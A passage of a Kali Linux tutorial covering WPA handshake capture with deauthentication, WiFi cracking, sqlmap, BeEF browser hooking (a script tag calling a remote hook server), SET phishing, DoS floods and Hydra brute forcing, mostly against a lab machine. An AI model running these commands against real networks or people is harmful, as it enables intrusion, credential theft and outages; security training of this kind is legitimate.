In the response above, you can see that ath0 is in monitor mode, on the 2.452GHz frequency which is channel 9 and the Access Point shows the MAC address of your wireless card. Only the madwifi-ng drivers show the card MAC address in the AP field, other drivers do not. So everything is good. It is important to confirm all this information prior to proceeding, otherwise the following steps will not work properly.

To match the frequency to the channel, check out: http://www.cisco.com/en/US/docs/wireless/technology/channel/deployment/guide/Channel.html#wp134132 . This will give you the frequency for each channel.

Step 1b – Setting up mac80211 drivers

Unlike madwifi-ng, you do not need to remove the wlan0 interface when setting up mac80211 drivers. Instead, use the following command to set up your card in monitor mode on channel 9:

 airmon-ng start wlan0 9

The system responds:

 Interface       Chipset         Driver
 
 wlan0           Broadcom        b43 - [phy0]
                                 (monitor mode enabled on mon0)

Notice that airmon-ng enabled monitor-mode on mon0. So, the correct interface name to use in later parts of the tutorial is mon0. Wlan0 is still in regular (managed) mode, and can be used as usual, provided that the AP that wlan0 is connected to is on the same channel as the AP you are attacking, and you are not performing any channel-hopping.

To confirm successful setup, run “iwconfig”. The following output should appear:

 lo        no wireless extensions.
 eth0      no wireless extensions.
 
 wmaster0  no wireless extensions.
 
 wlan0     IEEE 802.11bg  ESSID:""
           Mode:Managed  Frequency:2.452 GHz  Access Point: Not-Associated
           Tx-Power=0 dBm
           Retry min limit:7   RTS thr:off   Fragment thr=2352 B
           Encryption key:off
           Power Management:off
           Link Quality:0  Signal level:0  Noise level:0
           Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
           Tx excessive retries:0  Invalid misc:0   Missed beacon:0
 
 mon0      IEEE 802.11bg  Mode:Monitor  Frequency:2.452 GHz  Tx-Power=0 dBm
           Retry min limit:7   RTS thr:off   Fragment thr=2352 B
           Encryption key:off
           Power Management:off
           Link Quality:0  Signal level:0  Noise level:0
           Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
           Tx excessive retries:0  Invalid misc:0   Missed beacon:0

Here, mon0 is seen as being in monitor mode, on channel 9 (2.452GHz). Unlike madwifi-ng, the monitor interface has no Access Point field at all. Also notice that wlan0 is still present, and in managed mode – this is normal. Because both interfaces share a common radio, they must always be tuned to the same channel – changing the channel on one interface also changes channel on the other one.

Step 1c – Setting up other drivers

For other (ieee80211-based) drivers, simply run the following command to enable monitor mode (replace rausb0 with your interface name):

 airmon-ng start rausb0 9

The system responds:

 Interface       Chipset         Driver
 
 rausb0          Ralink          rt73 (monitor mode enabled)

At this point, the interface should be ready to use.

Step 2 – Start airodump-ng to collect authentication handshake

The purpose of this step is to run airodump-ng to capture the 4-way authentication handshake for the AP we are interested in.

Enter:

 airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0

Where:

  • -c 9 is the channel for the wireless network
  • –bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminates extraneous traffic.
  • -w psk is the file name prefix for the file which will contain the IVs.
  • ath0 is the interface name.

Important: Do NOT use the “–ivs” option. You must capture the full packets.

Here what it looks like if a wireless client is connected to the network:

  CH  9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
                                                                                                               
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                               
  00:14:6C:7E:40:80   39 100       51      116   14   9  54  WPA2 CCMP   PSK  teddy                           
                                                                                                               
  BSSID              STATION            PWR  Lost  Packets  Probes                                             
                                                                                                               
  00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2   35     0      116  

In the screen above, notice the “WPA handshake: 00:14:6C:7E:40:80” in the top right-hand corner. This means airodump-ng has successfully captured the four-way handshake.

Here it is with no connected wireless clients:

  CH  9 ][ Elapsed: 4 s ][ 2007-03-24 17:51 
                                                                                                               
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                               
  00:14:6C:7E:40:80   39 100       51        0    0   9  54  WPA2 CCMP   PSK  teddy                           
                                                                                                               
  BSSID              STATION            PWR  Lost  Packets  Probes                                             

Troubleshooting Tip

See the Troubleshooting Tips section below for ideas.

To see if you captured any handshake packets, there are two ways. Watch the airodump-ng screen for “ WPA handshake: 00:14:6C:7E:40:80” in the top right-hand corner. This means a four-way handshake was successfully captured. See just above for an example screenshot.

Use Wireshark and apply a filter of “eapol”. This displays only eapol packets you are interested in. Thus you can see if capture contains 0,1,2,3 or 4 eapol packets.

Step 3 – Use aireplay-ng to deauthenticate the wireless client

This step is optional. If you are patient, you can wait until airodump-ng captures a handshake when one or more clients connect to the AP. You only perform this step if you opted to actively speed up the process. The other constraint is that there must be a wireless client currently associated with the AP. If there is no wireless client currently associated with the AP, then you have to be patient and wait for one to connect to the AP so that a handshake can be captured. Needless to say, if a wireless client shows up later and airodump-ng did not capture the handshake, you can backtrack and perform this step.

This step sends a message to the wireless client saying that that it is no longer associated with the AP. The wireless client will then hopefully reauthenticate with the AP. The reauthentication is what generates the 4-way authentication handshake we are interested in collecting. This is what we use to break the WPA/WPA2 pre-shared key.

Based on the output of airodump-ng in the previous step, you determine a client which is currently connected. You need the MAC address for the following. Open another console session and enter:

 aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0

Where:

  • -0 means deauthentication
  • 1 is the number of deauths to send (you can send multiple if you wish)
  • -a 00:14:6C:7E:40:80 is the MAC address of the access point
  • -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
  • ath0 is the interface name

Here is what the output looks like:

 11:09:28  Sending DeAuth to station   -- STMAC: [00:0F:B5:34:30:30]

With luck this causes the client to reauthenticate and yield the 4-way handshake.

Fern Wifi Cracker

Fern Wifi cracker is one of the tools that Kali has to crack wireless.

Before opening Fern, we should turn the wireless card into monitoring mode. To do this, Type “airmon-ng start wlan-0” in the terminal.

Airmon Ng
ferm wifi cracker

Now, open Fern Wireless Cracker.

Step 1 − Applications → Click “Wireless Attacks” → “Fern Wireless Cracker”.

Fern Wireless Cracker

Step 2 − Select the Wireless card as shown in the following screenshot.

Wireless Card

Step 3 − Click “Scan for Access Points”.

Access Point
firm wifi cracker

Step 4 − After finishing the scan, it will show all the wireless networks found. In this case, only “WPA networks” was found.

WPA Network

Step 5 − Click WPA networks as shown in the above screenshot. It shows all the wireless found. Generally, in WPA networks, it performs Dictionary attacks as such.

Step 6 − Click “Browse” and find the wordlist to use for attack.

Wordlist
list of wifi

Step 7 − Click “Wifi Attack”.

Wifi Attack

Step 8 − After finishing the dictionary attack, it found the password and it will show as depicted in the following screenshot picture.

Dictionary Attack

Kismet

Kismet is a WIFI network analyzing tool. It is a 802.11 layer-2 wireless network detector, sniffer, and intrusion detection system. It will work with any wireless card that supports raw monitoring (rfmon) mode, and can sniff 802.11a/b/g/n traffic. It identifies the networks by collecting packets and also hidden networks.

To use it, turn the wireless card into monitoring mode and to do this, type “airmon-ng start wlan-0” in the terminal.

Start Wlan

Let’s learn how to use this tool.

Step 1 − To launch it, open terminal and type “kismet”.

Launch

Step 2 − Click “OK”.

Kismet

Step 3 − Click “Yes” when it asks to start Kismet Server. Otherwise it will stop functioning.

Start Server

Step 4 − Startup Options, leave as default. Click “Start”.

Leave Default

Step 5 − Now it will show a table asking you to define the wireless card. In such case, click Yes.

Define Table

Step 6 − In this case, the wireless source is “wlan0”. It will have to be written in the section “Intf” → click “Add”.

Wirless Source

Step 7 − It will start sniffing the wifi networks as shown in the following screenshot.

Networks

Step 8 − Click on any network, it produces the wireless details as shown in the following screenshot.

Wireless Network

GISKismet

GISKismet is a wireless visualization tool to represent data gathered using Kismet in a practical way. GISKismet stores the information in a database so we can query data and generate graphs using SQL. GISKismet currently uses SQLite for the database and GoogleEarth / KML files for graphing.

Let’s learn how to use this tool.

Step 1 − To open GISKismet, go to: Applications → Click “Wireless Attacks” → giskismet.

Giskismet

As you remember in the previous section, we used Kismet tool to explore data about wireless networks and all this data Kismet packs in netXML files.

Step 2 − To import this file into Giskismet, type “root@kali:~# giskismet -x Kismetfilename.netxml” and it will start importing the files.

Importing Files

Once imported, we can import them to Google Earth the Hotspots that we found before.

Step 3 − Assuming that we have already installed Google Earth, we click File → Open File that Giskismet created → Click “Open”.

Google Earth

The following map will be displayed.

Map

Ghost Phisher

Ghost Phisher is a popular tool that helps to create fake wireless access points and then later to create Man-in-The-Middle-Attack.

Step 1 − To open it, click Applications → Wireless Attacks → “ghost phishing”.

Ghost Phisher

Step 2 − After opening it, we will set up the fake AP using the following details.

  • Wireless Interface Input: wlan0
  • SSID: wireless AP name
  • IP address: IP that the AP will have
  • WAP: Password that will have this SSID to connect
Opening Ghost Phisher

Step 3 − Click the Start button.

Wifite

It is another wireless clacking tool, which attacks multiple WEP, WPA, and WPS encrypted networks in a row.

Firstly, the wireless card has to be in the monitoring mode.

Step 1 − To open it, go to Applications → Wireless Attack → Wifite.

Wifite

Step 2 − Type “wifite –showb”to scan for the networks.

Wifite Showb
Scan Network

Step 3 − To start attacking the wireless networks, click Ctrl + C.

Attacking

Step 4 − Type “1” to crack the first wireless.

Crack First

Step 5 − After attacking is complete, the key will be found.

Key Found

In this chapter, we will learn about website penetration testing offered by Kali Linux.

Vega Usage

Vega is a free and open source scanner and testing platform to test the security of web applications. Vega can help you find and validate SQL Injection, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows.

Vega includes an automated scanner for quick tests and an intercepting proxy for tactical inspection. Vega can be extended using a powerful API in the language of the web: JavaScript. The official webpage is https://subgraph.com/vega/

Subgraph

Step 1 − To open Vega go to Applications → 03-Web Application Analysis → Vega

Vega

Step 2 − If you don’t see an application in the path, type the following command.

Subgraph

Step 3 − To start a scan, click “+” sign.

Subgraph Vega

Step 4 − Enter the webpage URL that will be scanned. In this case, it is metasploitable machine → click “ Next”.

Enter Page URL

Step 5 − Check all the boxes of the modules you want to be controlled. Then, click “Next”.

Module Boxes

Step 6 − Click “Next” again in the following screenshot.

Next Again

Step 7 − Click “Finish”.

Finish Button

Step 8 − If the following table pops up, click “Yes”.

Follow Redirect

The scan will continue as shown in the following screenshot.

Scanner Progress

Step 9 − After the scan is completed, on the left down panel you can see all the findings, that are categorized according to the severity. If you click it, you will see all the details of the vulnerabilities on the right panel such as “Request”, ”Discussion”, ”Impact”, and ”Remediation”.

Left Down Panel

ZapProxy

ZAP-OWASP Zed Attack Proxy is an easy-to-use integrated penetration testing tool for finding vulnerabilities in web applications. It is a Java interface.

Step 1 − To open ZapProxy, go to Applications → 03-Web Application Analysis → owaspzap.

ZapProxy

Step 2 − Click “Accept”.

Licensed Version

ZAP will start to load.

OWASP Zap

Step 3 − Choose one of the Options from as shown in the following screenshot and click “Start”.

Choose Options

Following web is metasploitable with IP :192.168.1.101

Web Metasploitable

Step 4 − Enter URL of the testing web at “URL to attack” → click “Attack”.

Url Attack

After the scan is completed, on the top left panel you will see all the crawled sites.

In the left panel “Alerts”, you will see all the findings along with the description.

Alerts

Step 5 − Click “Spider” and you will see all the links scanned.

Spider

Database Tools Usage

sqlmap

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Let’s learn how to use sqlmap.

Step 1 − To open sqlmap, go to Applications → 04-Database Assessment → sqlmap.

SQLMap

The webpage having vulnerable parameters to SQL Injection is metasploitable.

SQL Injection

Step 2 − To start the sql injection testing, type “sqlmap – u URL of victim”

Url Victim

Step 3 − From the results, you will see that some variable are vulnerable.

Variable Results

sqlninja

sqlninja is a SQL Injection on Microsoft SQL Server to a full GUI access. sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end. Full information regarding this tool can be found on http://sqlninja.sourceforge.net/

Step 1 − To open sqlninja go to Applications → 04-Database Assesment → sqlninja.

Database Assesment

CMS Scanning Tools

WPScan

WPScan is a black box WordPress vulnerability scanner that can be used to scan remote WordPress installations to find security issues.

Step 1 − To open WPscan go to Applications → 03-Web Application Analysis → “wpscan”.

Web Application

The following screenshot pops up.

Wpscan

Step 2 − To scan a website for vulnerabilities, type “wpscan –u URL of webpage”.

If the scanner is not updated, it will ask you to update. I will recommend to do it.

Scanner Update

Once the scan starts, you will see the findings. In the following screenshot, vulnerabilities are indicated by a red arrow.

Red Arrow
Scan Starts

Joomscan

Joomla is probably the most widely-used CMS out there due to its flexibility. For this CMS, it is a Joomla scanner. It will help web developers and web masters to help identify possible security weaknesses on their deployed Joomla sites.

Step 1 − To open it, just click the left panel at the terminal, then “joomscan – parameter”.

Step 2 − To get help for the usage type “joomscan /?”

Joomscan

Step 3 − To start the scan, type “ joomscan –u URL of the victim”.

OWASP

Results will be displayed as shown in the following screenshot.

Vulnerability
Suggestion

SSL Scanning Tools

TLSSLed is a Linux shell script used to evaluate the security of a target SSL/TLS (HTTPS) web server implementation. It is based on sslscan, a thorough SSL/TLS scanner that is based on the openssl library, and on the “openssl s_client” command line tool.

The current tests include checking if the target supports the SSLv2 protocol, the NULL cipher, weak ciphers based on their key length (40 or 56 bits), the availability of strong ciphers (like AES), if the digital certificate is MD5 signed, and the current SSL/TLS renegotiation capabilities.

To start testing, open a terminal and type “tlssled URL port“. It will start to test the certificate to find data.

Tissled

You can see from the finding that the certificate is valid until 2018 as shown in green in the following screenshot.

Certificate

w3af

w3af is a Web Application Attack and Audit Framework which aims to identify and exploit all web application vulnerabilities. This package provides a Graphical User Interface (GUI) for the framework. If you want a command-line application only, install w3af-console.

The framework has been called the “metasploit for the web”, but it’s actually much more as it also discovers the web application vulnerabilities using black-box scanning techniques. The w3af core and its plugins are fully written in Python. The project has more than 130 plugins, which identify and exploit SQL injection, cross-site scripting (XSS), remote file inclusion and more.

Step 1 − To open it, go to Applications → 03-Web Application Analysis → Click w3af.

Application W3af

Step 2 − On the “Target” enter the URL of victim which in this case will be metasploitable web address.

Target

Step 3 − Select the profile → Click “Start”.

Profile Start

Step 4 − Go to “Results” and you can see the finding with the details.

Finding Results

In this chapter, we will learn about the various exploitation tools offered by Kali Linux.

Metasploit

As we mentioned before, Metasploit is a product of Rapid7 and most of the resources can be found on their web page www.metasploit.com. It is available in two versions – commercial and free edition. The differences between these two versions is not much hence, in this case we will be using the Community version (free).

As an Ethical Hacker, you will be using “Kali Ditribution” which has the Metasploit community version embedded, along with other ethical hacking tools which are very comfortable by saving time of installation. However, if you want to install as a separate tool it is an application that can be installed in the operating systems like Linux, Windows and OS X.

First, open the Metasploit Console in Kali. Then, go to Applications → Exploitation Tools → Metasploit.

Exploitation Tools

After it starts, you will see the following screen, where the version of Metasploit is underlined in red.

Metasploit Version

In the console, if you use help or ? symbol, it will show you a list with the commands of MSP along with their description. You can choose based on your needs and what you will use.

Console Symbol

Another important administration command is msfupdate which helps to update the metasploit with the latest vulnerability exploits. After running this command in the console, you will have to wait several minutes until the update is complete.

MSFUpdate

It has a good command called “Search” which you can use to find what you want as shown in the following screenshot. For example, I want to find exploits related to Microsoft and the command can be msf >search name:Microsoft type:exploit.

Where “search” is the command, ”name” is the name of the object that we are looking for, and “type” is what kind of script we are looking for.

Search Command

Another command is “info”. It provides the information regarding a module or platform where it is used, who is the author, vulnerability reference, and the payload restriction that this can have.

Info Command

Armitage

Armitage GUI for metasploit is a complement tool for metasploit. It visualizes targets, recommends exploits, and exposes the advanced post-exploitation features.

Let’s open it, but firstly metasploit console should be opened and started. To open Armitage, go to Applications → Exploit Tools → Armitage.

Armitage

Click the Connect button, as shown in the following screenshot.

Connect

When it opens, you will see the following screen.

User Friendly

Armitage is user friendly. The area “Targets” lists all the machines that you have discovered and you are working with, the hacked targets are red in color with a thunderstorm on it.

After you have hacked the target, you can right-click on it and continue exploring with what you need to do such as exploring (browsing) the folders.

Exploring

In the following GUI, you will see the view for the folders, which is called console. Just by clicking the folders, you can navigate through the folders without the need of metasploit commands.

On the right side of the GUI, is a section where the modules of vulnerabilities are listed.

Console Folder

BeEF

BeEF stands for Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. BeEF allows the professional penetration tester to assess the actual security posture of a target environment using client-side attack vectors.

First, you have to update the Kali package using the following commands −

root@kali:/# apt-get update  
root@kali:/# apt-get install beef-xss 

To start, use the following command −

root@kali:/# cd /usr/share/beef-xss  
root@kali:/# ./beef 
Kali Package

Open the browser and enter the username and password: beef.

Open Browser

The BeEF hook is a JavaScript file hosted on the BeEF server that needs to run on client browsers. When it does, it calls back to the BeEF server communicating a lot of information about the target. It also allows additional commands and modules to be ran against the target. In this example, the location of BeEF hook is at http://192.168.1.101:3000/hook.js.

In order to attack a browser, include the JavaScript hook in a page that the client will view. There are a number of ways to do that, however the easiest is to insert the following into a page and somehow get the client to open it.

<script src = "http://192.168.1.101:3000/hook.js" type = "text/javascript"></script> 

Once the page loads, go back to the BeEF Control Panel and click “Online Browsers” on the top left. After a few seconds, you should see your IP address pop-up representing a hooked browser. Hovering over the IP will quickly provide information such as the browser version, operating system, and what plugins are installed.

Page Load

To remotely run the command, click the “Owned” host. Then, on the command click the module that you want to execute, and finally click “Execute”.

Run Remotely

Linux Exploit Suggester

It suggests possible exploits given the release version ‘uname -r’ of the Linux Operating System.

To run it, type the following command −

root@kali:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0

3.0.0 is the kernel version of Linux OS that we want to exploit.

Kernel Version

In this chapter, we will learn about the forensics tools available in Kali Linux.

p0f

p0f is a tool that can identify the operating system of a target host simply by examining captured packets even when the device in question is behind a packet firewall. P0f does not generate any additional network traffic, direct or indirect; no name lookups; no mysterious probes; no ARIN queries; nothing. In the hands of advanced users, P0f can detect firewall presence, NAT use, and existence of load balancers.

Type “p0f – h” in the terminal to see how to use it and you will get the following results.

Target Host
Advanced Users

It will list even the available interfaces.

Available Interface

Then, type the following command: “p0f –i eth0 –p -o filename”.

Where the parameter “-i” is the interface name as shown above. “-p” means it is in promiscuous mode. “-o” means the output will be saved in a file.

Type of Command

Open a webpage with the address 192.168.1.2

Webpage Address

From the results, you can observe that the Webserver is using apache 2.x and the OS is Debian.

pdf-parser

pdf-parser is a tool that parses a PDF document to identify the fundamental elements used in the analyzed pdf file. It will not render a PDF document. It is not recommended for text book case for PDF parsers, however it gets the job done. Generally, this is used for pdf files that you suspect has a script embedded in it.

The command is −

pdf-parser  -o 10 filepath

where “-o” is the number of objects.

Number Object

As you can see in the following screenshot, the pdf file opens a CMD command.

CMD Command

Dumpzilla

Dumpzilla application is developed in Python 3.x and has as a purpose to extract all forensic interesting information of Firefox, Iceweasel, and Seamonkey browsers to be analyzed.

ddrescue

It copies data from one file or block device (hard disc, cdrom, etc.) to another, trying to rescue the good parts first in case of read errors.

The basic operation of ddrescue is fully automatic. That is, you don’t have to wait for an error, stop the program, restart it from a new position, etc.

If you use the mapfile feature of ddrescue, the data is rescued very efficiently (only the needed blocks are read). Also, you can interrupt the rescue at any time and resume it later at the same point. The mapfile is an essential part of ddrescue’s effectiveness. Use it unless you know what you are doing.

The command line is −

dd_rescue infilepath  outfilepath

Parameter “–v” means verbose. “/dev/sdb” is the folder to be rescued. The img file is the recovered image.

Recovered Image

DFF

It is another forensic tool used to recover the files. It has a GUI too. To open it, type “dff-gui” in the terminal and the following web GUI will open.

DFF GUI

Click File → “Open Evidence”.

Open Evidence

The following table will open. Check “Raw format” and click “+” to select the folder that you want to recover.

Raw Format

Then, you can browse the files on the left of the pane to see what has been recovered.

Browse File

In this chapter, we will learn about the social engineering tools used in Kali Linux.

Social Engineering Toolkit Usage

The Social-Engineer Toolkit (SET) is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack in a fraction of time. These kind of tools use human behaviors to trick them to the attack vectors.

Let’s learn how to use the Social Engineer Toolkit.

Step 1 − To open SET, go to Applications → Social Engineering Tools → Click “SET” Social Engineering Tool.

Social Engineering Tools

Step 2 − It will ask if you agree with the terms of usage. Type “y” as shown in the following screenshot.

Type Y

Step 3 − Most of the menus shown in the following screenshot are self-explained and among them the most important is the number 1 “Social Engineering Attacks”.

Self Explained

Step 4 − Type “1” → Enter. A submenu will open. If you press the Enter button again, you will see the explanations for each submenu.

The Spear-phishing module allows you to specially craft email messages and send them to your targeted victims with attached FileFormatmalicious payloads. For example, sending malicious PDF document which if the victim opens, it will compromise the system. If you want to spoof your email address, be sure “Sendmail” is installed (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF flag to SENDMAIL=ON.

There are two options for the spear phishing attack −

  • Perform a Mass Email Attack
  • Create a FileFormat Payload and a Social-Engineering Template

The first one is letting SET do everything for you (option 1), the second one is to create your own FileFormat payload and use it in your own attack.

Third Party

Type “99” to go back to the main menu and then type “2” to go to “The web attack vectors”.

The web attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim. This module is used by performing phishing attacks against the victim if they click the link. There is a wide variety of attacks that can occur once they click a link.

Multi Attack

Type “99” to return to the main menu and then type “3”.

The infectious USB/CD/DVD module will create an autorun.inf file and a Metasploit payload. The payload and autorun file is burned or copied on a USB. When DVD/USB/CD is inserted in the victim’s machine, it will trigger an autorun feature (if autorun is enabled) and hopefully compromise the system. You can pick the attack vector you wish to use: fileformat bugs or a straight executable.

Following are the options for Infectious Media Generator.

  • File-Format Exploits
  • Standard Metasploit Executable
Infectious

Type “99” to go back to the main menu. Then, type “4” to go to “The web attack vectors”.

The create payload and listener is a simple way to create a Metasploit payload. It will export the exe file for you and generate a listener. You would need to convince the victim to download the exe file and execute it to get the shell.

Create Payload

Type “99” to go back to the main menu and then type “5” to go to “The web attack vectors”.

Web Attack Vector

The mass mailer attack will allow you to send multiple emails to victims and customize the messages. There are two options on the mass e-mailer; the first is to send an email to a single email address. The second option allows you to import a list that has all recipient emails and it will send your message to as many people as you want within that list.

  • E-Mail Attack Single Email Address
  • E-Mail Attack Mass Mailer

Type “99” to go back to the main menu and then type “9” to go to “Powershell Attack Vector”.

Powershell

The Powershell Attack Vector module allows you to create PowerShell specific attacks. These attacks allow you to use PowerShell, which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by preventive technologies.

  • Powershell Alphanumeric Shellcode Injector
  • Powershell Reverse Shell
  • Powershell Bind Shell
  • Powershell Dump SAM Database

Stressing tools are used to create DoS attacks or to create the stress test for different applications so as take appropriate measures for the future.

All the Stress testing tools are found in Applications → 02-Vulnerability Analysis → Stress testing.

Vulnerability Analysis

All Stress testing test will be done on metsploitable machine which has IP of 192.168.1.102

Stress Testing

Slowhttptest

Slowhttptest is one of the DoS attacking tools. It especially uses HTTP protocol to connect with the server and to keep the resources busy such as CPU and RAM. Let’s see in detail how to use it and explain its functions.

To open slowhttptest, first open the terminal and type “slowhttptest –parameters”.

You can type “slowhttptest –h” to see all the paramenters that you need to use. In case you receive an output, ‘Command not found’ you have to first type “apt-get install slowhttptest”.

Show Http Test
Command Not Found

Then after installation, again type slowhttptest –h

Slow Headers

Type the following command −

slowhttptest -c 500 -H -g -o outputfile -i 10 -r 200 -t GET –u 
http://192.168.1.202/index.php -x 24 -p 2

Where,

  • (-c 500) = 500 connections
  • (-H) = Slowloris mode
  • -g = Generate statistics
  • -o outputfile = Output file name
  • -i 10 = Use 10 seconds to wait for data
  • -r 200 = 200 connections with -t GET = GET requests
  • -u http://192.168.1.202/index.php = target URL
  • -x 24 = maximum of length of 24 bytes
  • -p 2 = 2-second timeout
Time Seconds

Once the test starts, the output will be as shown in the following screenshot, where you can notice that the service is available.

Test Starts

After a while, at the 287 connection the service goes down. This means that the server can handle a maximum of 287 HTTP connections.

Connection

Inviteflood

Inviteflood is a SIP/SDP INVITE message flooding over UDP/IP. It executes on a variety of Linux distributions. It carries out DoS (Denial of Service) attacks against SIP devices by sending multiple INVITE requests.

To open Inviteflood, first open the terminal and type “inviteflood –parameters”

For help, you can use “inviteflood –h”

Invite Flood

Next, you can use the following command −

inviteflood eth0 target_extension  target_domain target_ip number_of_packets

Where,

  • target_extension is 2000
  • target_domain is 192.168.x.x
  • target_ip is 192.168.x.x
  • number_of_packets is 1
  • -a is alias of SIP account
Target Execution

Iaxflood

Iaxflood is a VoIP DoS tool. To open it, type “iaxflood sourcename destinationname numpackets” in the terminal.

To know how to use, type “iaxflood –h”

Iaxflood

thc-ssl-dos

THC-SSL-DOS is a tool to verify the performance of SSL. Establishing a secure SSL connection requires 15x more processing power on the server than on the client. THCSSL-DOS exploits this asymmetric property by overloading the server and knocking it off the Internet.

Following is the command −

thc-ssl-dos victimIP httpsport –accept 

In this example, it will be −

thc-ssl-dos 192.168.1.1 443 –accept 

Its output would be as follows −

SSL Performance
SSL Error

The basic concept of sniffing tools is as simple as wiretapping and Kali Linux has some popular tools for this purpose. In this chapter, we will learn about the sniffing and spoofing tools available in Kali.

Burpsuite

Burpsuite can be used as a sniffing tool between your browser and the webservers to find the parameters that the web application uses.

To open Burpsuite, go to Applications → Web Application Analysis → burpsuite.

Web Analysis

To make the setup of sniffing, we configure burpsuite to behave as a proxy. To do this, go to Options as shown in the following screenshot. Check the box as shown.

In this case, the proxy IP will be 127.0.0.1 with port 8080.

Proxy IP

Then configure the browser proxy which is the IP of burpsuite machine and the port.

Configure Browser

To start interception, go to Proxy → Intercept → click “Intercept is on”.

Continue to navigate on the webpage that you want to find the parameter to test for vulnerabilities.

Intercept

In this case, it is metasploitable machine with IP 192.168.1.102

Machine IP

Go to “HTTP History”. In the following screenshot, the line marked in red arrow shows the last request. In Raw and the hidden parameter such as the Session ID and other parameter such as user name and password has been underlined in red.

Request Parameter

mitmproxy

mitmproxy is an SSL-capable man-in-the-middle HTTP proxy. It provides a console interface that allows traffic flows to be inspected and edited on the fly.

To open it, go to the terminal and type “mitmproxy -parameter” and for getting help on commands, type “mitmproxy –h”.

Mitmproxy

To start the mitmproxy, type “mitmproxy –p portnumber”. In this case, it is “mitmproxy –p 80”.

Port Number

Wireshark

Wireshark is one of the best data packet analyzers. It analyzes deeply the packets in frame level. You can get more information on Wireshark from their official webpage: https://www.wireshark.org/. In Kali, it is found using the following path – Applications → Sniffing & Spoofing → wireshark.

Wireshark

Once you click wireshark, the following GUI opens up.

Wireshark GUI

Click “Start” and the packet capturing will start as shown in the following screenshot.

Packet Capturing

sslstrip

sslstrip is a MITM attack that forces a victim’s browser to communicate in plain-text over HTTP, and the proxies modifies the content from an HTTPS server. To do this, sslstrip is “stripping” https:// URLs and turning them into http:// URLs.

To open it, go to Applications → 09-Sniffing & Spoofing → Spoofing and MITM → sslstrip.

Spoofing
Application MITM

To set it up, write to forward all the 80 port communication to 8080.

Port Comminucation

Then, start the sslstrip command for the port needed.

SSLtrip Command

In this chapter, we will learn about the important password cracking tools used in Kali Linux.

Hydra

Hydra is a login cracker that supports many protocols to attack ( Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP).

To open it, go to Applications → Password Attacks → Online Attacks → hydra.

Hydra

It will open the terminal console, as shown in the following screenshot.

Open Terminal

In this case, we will brute force FTP service of metasploitable machine, which has IP 192.168.1.101

Brute Force

We have created in Kali a word list with extension ‘lst’ in the path usr\share\wordlist\metasploit.

Share Wordlist

The command will be as follows −

hydra -l /usr/share/wordlists/metasploit/user -P 
/usr/share/wordlists/metasploit/ passwords ftp://192.168.1.101 –V 

where –V is the username and password while trying

Hydra Command

As shown in the following screenshot, the username and password are found which are msfadmin:msfadmin

Admin Password

Johnny

Johnny is a GUI for the John the Ripper password cracking tool. Generally, it is used for weak passwords.

To open it, go to Applications → Password Attacks → johnny.

Johnny

In this case, we will get the password of Kali machine with the following command and a file will be created on the desktop.

Desktop

Click “Open Passwd File” → OK and all the files will be shown as in the following screenshot.

Open File

Click “Start Attack”.

Start Attack

After the attack is complete, click the left panel at “Passwords” and the password will be unshaded.

Unshaded

John

john is a command line version of Johnny GUI. To start it, open the Terminal and type “john”.

Unshadowing

In case of unshadowing the password, we need to write the following command −

root@kali:~# unshadow passwd shadow > unshadowed.txt 

Rainbowcrack

The RainbowCrack software cracks hashes by rainbow table lookup. Rainbow tables are ordinary files stored on the hard disk. Generally, Rainbow tables are bought online or can be compiled with different tools.

To open it, go to Applications → Password Attacks → click “rainbowcrack”.

RainbowCrack

The command to crack a hash password is −

rcrack path_to_rainbow_tables -f path_to_password_hash 

SQLdict

It is a dictionary attack tool for SQL server and is very easy and basic to be used. To open it, open the terminal and type “sqldict”. It will open the following view.

Sql Dict

Under “Target IP Server”, enter the IP of the server holding the SQL. Under “Target Account”, enter the username. Then load the file with the password and click “start” until it finishes.

hash-identifier

It is a tool that is used to identify types of hashes, meaning what they are being used for. For example, if I have a HASH, it can tell me if it is a Linux or windows HASH.

Hash Identifier

The above screen shows that it can be a MD5 hash and it seems a Domain cached credential.

In this chapter, we will see the tools that Kali uses to maintain connection and for access to a hacked machine even when it connects and disconnects again.

Powersploit

This is a tool that is for Windows machines. It has PowerShell installed in victims machine. This tool helps the hacker to connect with the victim’s machine via PowerShell.

To open it, open the terminal on the left and type the following command to enter into the powersploit folder −

cd /usr/share/powersploit/ 

